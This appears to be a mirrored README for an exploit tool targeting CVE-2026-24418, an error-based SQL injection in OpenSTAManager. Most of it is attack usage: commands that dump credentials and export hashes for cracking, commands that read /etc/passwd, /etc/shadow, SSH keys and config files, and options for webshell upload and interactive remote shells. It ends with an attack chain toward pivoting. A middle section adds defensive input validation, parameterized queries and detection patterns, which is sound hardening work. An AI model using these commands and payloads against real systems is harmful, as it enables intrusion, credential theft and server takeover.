## https://sploitus.com/exploit?id=A7634540-503D-5B85-9921-973A2342C332
# CVE-2026-24418


### Reconnaissance

```bash
# Database info + privileges + user credentials
python3 exploit.py -t http://target.com -u admin -p secret --all

# Check MySQL privileges (FILE, SUPER, etc.)
python3 exploit.py -t http://target.com -u admin -p secret --privs
```

### Credential Extraction

```bash
# Dump users and auto-export hashes
python3 exploit.py -t http://target.com -u admin -p secret --users -o ./loot

# Output files:
#   ./loot/users.json          - Full user data
#   ./loot/users.csv           - CSV format
#   ./loot/hashes_hashcat.txt  - Hashcat format (mode 3200)
#   ./loot/hashes_john.txt     - John format (user:hash)
```

### Database Enumeration

```bash
# List all databases
python3 exploit.py -t http://target.com -u admin -p secret --dbs

# List tables in a specific database
python3 exploit.py -t http://target.com -u admin -p secret --tables -D openstamanager

# List columns of a table
python3 exploit.py -t http://target.com -u admin -p secret --columns -T zz_users

# Dump specific columns with row limit
python3 exploit.py -t http://target.com -u admin -p secret --dump -T zz_users -C username,password --limit 10
```

### File Read (LFI via SQL)

```bash
# Read /etc/passwd
python3 exploit.py -t http://target.com -u admin -p secret --file-read /etc/passwd

# Read application config (database credentials)
python3 exploit.py -t http://target.com -u admin -p secret --file-read /var/www/html/openstamanager/config.inc.php

# Read SSH keys
python3 exploit.py -t http://target.com -u admin -p secret --file-read /home/user/.ssh/id_rsa

# HEX mode (bypass character filters)
python3 exploit.py -t http://target.com -u admin -p secret --file-read-hex /etc/shadow
```

### Remote Code Execution

```bash
# Upload webshell (auto-detects webroot)
python3 exploit.py -t http://target.com -u admin -p secret --webshell

# Upload webshell with specific webroot
python3 exploit.py -t http://target.com -u admin -p secret --webshell --webroot /var/www/html

# Interactive shell session
python3 exploit.py -t http://target.com -u admin -p secret --rce

# RCE will auto-upload webshell if none exists
```

### Output & Reporting

```bash
# Save everything to a directory
python3 exploit.py -t http://target.com -u admin -p secret --all -o ./loot

# Generated files:
#   db_info.json, privileges.json, users.json, users.csv,
#   hashes_hashcat.txt, hashes_john.txt
```

### Network Options

```bash
# Through Burp Suite proxy
python3 exploit.py -t http://target.com -u admin -p secret --users --proxy http://127.0.0.1:8080

# With request delay (2 seconds between requests)
python3 exploit.py -t http://target.com -u admin -p secret --users --delay 2

# Skip SSL verification
python3 exploit.py -t https://target.com -u admin -p secret --info -k
```

## Full Option Reference

```
Target:
  -t, --target           Target base URL

Authentication:
  -u, --user             Username for login
  -p, --password         Password for login
  -c, --cookie           Existing PHPSESSID value

Enumeration:
  -D, --database         Target database name
  -T, --table            Target table name
  -C, --columns-list     Columns to dump (comma-separated)
  --limit                Row limit for dumps

Actions:
  --info                 Database server information
  --users                Dump zz_users credentials
  --dbs                  Enumerate databases
  --tables               List tables
  --columns              List columns (requires -T)
  --dump                 Dump data (requires -T and -C)
  --sql QUERY            Custom SQL query
  --all                  Run --info + --privs + --users
  --privs                Check MySQL privileges

File Operations:
  --file-read PATH       Read file via LOAD_FILE()
  --file-read-hex PATH   Read file via HEX encoding

Remote Code Execution:
  --webshell             Upload PHP webshell
  --webroot PATH         Webroot path for shell upload
  --rce                  Interactive command execution

Output:
  -o, --output DIR       Save results to directory

Network:
  -m, --module-id        Module ID (default: 18)
  --proxy                HTTP proxy URL
  -k, --no-ssl-verify    Disable SSL verification
  --delay                Request delay in seconds
```

## Technical Details

### Payload Structure

```
id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,()))#
```

### EXTRACTVALUE Character Limit

MySQL's `EXTRACTVALUE()` reflects at most about 32 characters of the injected string in its XPath error message. The tool therefore chunks longer results with `SUBSTRING()` and reassembles them:

```sql
SUBSTRING((), 1, 31)    -- Chunk 1
SUBSTRING((), 32, 31)   -- Chunk 2
...
```

### Webshell Upload Mechanism

> **Technical Note on Error-Based Context:** While `--webshell` and `--rce` are included for maximum coverage, MySQL strictly forbids using `INTO DUMPFILE` within a subquery or an `IN()` clause (which is exactly where this CVE's injection point is located). 
> 
> Therefore, writing files directly via this specific error-based injection will typically fail with a syntax error unless:
> 1. The target environment allows Stacked Queries (very rare in modern PHP/PDO setups).
> 2. You manage to pivot the payload into a UNION-based injection.
> 
> If you confirm `FILE` privileges via `--privs`, your best bet is using `--file-read` and `--file-read-hex`, as `LOAD_FILE()` works flawlessly inside error-based subqueries.

When FILE privilege is available and constraints allow:

```sql
SELECT 0x INTO DUMPFILE '/var/www/html/shell.php'
```

### Vulnerable Code Path

```
POST /actions.php?id_module=18
    └── actions.php (L503-506) ─── receives id_records[]
        └── array_clean() ─── only removes empty values
            └── bulk.php (L88) ─── builds SQL IN() clause
                └── Database.php (L289) ─── executes unsanitized query
                    └── XPATH error leaks data
```
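The defensive counterpart to the path above, as an added example that is not part of this tool or of OpenSTAManager: a validator that admits `id_records[]` only as plain integers (the check `array_clean()` does not perform), a placeholder-based `IN()` builder, and a scanner that flags POST bodies carrying the error-based injection signature. The sample bodies are constructed; the function names are assumptions.

```python
import re
from urllib.parse import parse_qs

# Only plain decimal integers may reach the IN() clause.
_INT_RE = re.compile(r"^[0-9]{1,18}$")
# Signature of the error-based payload structure documented on this page.
_SQLI_RE = re.compile(r"EXTRACTVALUE\s*\(|UPDATEXML\s*\(|0x7e|LOAD_FILE\s*\(", re.I)


def validate_id_records(values):
    """Drop empty entries (as array_clean() does) and return ints;
    raise ValueError on anything that is not a plain integer."""
    ids = []
    for v in values:
        v = v.strip()
        if v == "":
            continue
        if not _INT_RE.match(v):
            raise ValueError("id_records[] contains a non-integer value: %r" % v)
        ids.append(int(v))
    return ids


def build_in_clause(ids):
    """Build the IN() clause from placeholders; the values travel as bind
    parameters instead of being concatenated into the SQL text."""
    if not ids:
        return None, []
    return "id IN (" + ",".join("?" * len(ids)) + ")", list(ids)


def scan_post_body(body):
    """Flag id_records[] values in an actions.php POST body that either
    match the injection signature or are simply not integers."""
    findings = []
    for v in parse_qs(body, keep_blank_values=True).get("id_records[]", []):
        stripped = v.strip()
        if _SQLI_RE.search(v):
            findings.append(("sqli-signature", v))
        elif stripped and not _INT_RE.match(stripped):
            findings.append(("non-integer", v))
    return findings


if __name__ == "__main__":
    # Constructed sample bodies: one benign, one using the page's payload shape.
    print(scan_post_body("id_records[]=12&id_records[]=13&op=delete-bulk"))
    print(scan_post_body("id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,()))#"))
```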

## Attack Chain Example

```
1. --privs        → Check FILE privilege
2. --users        → Dump credentials, export hashes
3. --file-read    → Read config.inc.php for DB creds
4. --file-read    → Read /etc/passwd for usernames
5. --webshell     → Upload PHP webshell
6. --rce          → Interactive shell → pivot
```

## Disclaimer

This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing. The author assumes no liability for misuse.

## References

- [CVE-2026-24418 (NVD)](https://nvd.nist.gov/vuln/detail/CVE-2026-24418)
- [GitHub Security Advisory GHSA-4xwv-49c8-fvhq](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq)
- [OpenSTAManager Repository](https://github.com/devcode-it/openstamanager)
- [PoC by Lukasz Rybak](https://github.com/lukasz-rybak/CVE-2026-24418)